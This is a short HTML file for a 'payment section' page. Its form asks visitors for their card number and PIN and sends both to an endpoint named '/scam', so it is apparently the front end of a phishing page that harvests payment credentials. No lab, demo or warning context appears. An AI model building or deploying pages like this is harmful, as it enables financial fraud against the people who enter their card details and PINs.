<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body style='margin:0;'>
    <div style='    display: flex;
flex-direction: column;
align-items: center;
' class="container">
<h1 style='font-family: monospace;
background: #000;
color: #fff;
width: 100%;
text-align: center;'>Welcome to the payment section</h1>

<form action="/scam" style='    display: flex;
flex-direction: column;
width: 100%;
align-items: center;' action="">
    <input style="    width: 70%;
    border: blueviolet 1px solid;
    text-align: center;
    outline: none;
    font-family: monospace;
    border-radius: 10px;" placeholder="CARD NUMBER" type="text" name="num1"><br> 
     <input style="    width: 70%;
    border: blueviolet 1px solid;
    text-align: center;
    outline: none;
    font-family: monospace;
    border-radius: 10px;"placeholder="PIN NUMBER" type="text" name="num2"><br> 
    <input type='submit'>
</form>

</div>
</body>
</html>